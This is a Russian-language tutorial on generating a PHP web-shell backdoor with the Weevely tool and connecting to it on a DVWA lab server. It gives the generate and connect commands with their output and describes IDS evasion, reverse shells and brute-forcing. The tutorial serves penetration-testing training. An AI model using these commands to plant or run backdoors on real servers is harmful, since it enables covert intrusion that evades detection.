Как создать PHP Web Shell и Backdoor с помощью Weevely

Сегодня мы собираемся создать простой PHP шелл и бэкдор с помощью Weevely.

Weevely — это веб-оболочка командной строки, динамически расширяемая по сети во время выполнения, предназначенная для удаленного администрирования сервера и тестирования на проникновение.

Его терминал выполняет произвольный удаленный код через небольшой PHP-агент footprint, который находится на HTTP-сервере.

Более 30 модулей формируют адаптивное веб-администрирование и пост-эксплуатационный бэкдор для обслуживания доступа, эскалации привилегий и сетевых изменений даже в ограниченной среде.

Веб-оболочка Weevely php stealth и бэкдор имеют более 30 модулей, доступных для пост-эксплуатационных задач.

Основные возможности

  • Ssh-подобный терминал
  • Консоль SQL, повернутая на цели
  • Прокси-сервер HTTP
  • Аудит безопасности конфигурации хоста
  • Монтирование удаленной файловой системы
  • Сканирование сети развернуто по цели
  • Загрузка и скачивание файлов
  • Реверсивная и прямая оболочка TCP
  • Поддержка Meterpreter
  • Учетная запись службы bruteforce
  • Управление сжатым архивом

Weevely php прячет вэб шелл  и бэкдор, каждая связь между сервером и клиентом скрыта в HTTP Cookies.

Связь между клиентом и сервером обфускцируется, чтобы обходить обнаружение по сигнатурам IDS.

  • Weevely https://github.com/epinna/weevely3
  • Веб-сервер (я использую DVWA)

Создание бэкдор-агента

Клиент Weevely связывается с агентом PHP, установленным на цели.

Перейдите в папку weevely3/и запустите ./weevely.py, чтобы посмотреть справку или просто просто печатать в своем терминале.

 # weevely

[+] weevely 3.2.0
[!] Error: too few arguments

[+] Run terminal to the target
weevely <URL> <password> [cmd]

[+] Load session file
weevely session <path> [cmd]

[+] Generate backdoor agent
weevely generate <password> <path> 

Чтобы создать новый агент, просто используйте параметр generate, передающий аргументы пароля и пути.

 # weevely generate 123 /root/Desktop/backdoor.php
Generated backdoor with password '123' in '/root/Desktop/backdoor.php' of 1439 byte size. 

Затем загрузите сгенерированный агент в целевую веб-папку.

Убедитесь, что PHP-скрипт агента правильно отображается и выполняется через веб-сервер.

Подключение к агенту

 

 Запустите weevely script для подключения к удаленному агенту.</span></span>

# weevely http: //localhost/backdoor.php 123
weevely< 

 

Первая строка weevely> по-прежнему не подключено, чтобы пользователи могли установить любую полезную опцию предварительного подключения, например. установите прокси-серверы, которые будут использоваться.

Запуск реальной команды автоматически запускает сеанс на удаленной цели.

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

cryptoparty

Cryptography is typically bypassed, not penetrated.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *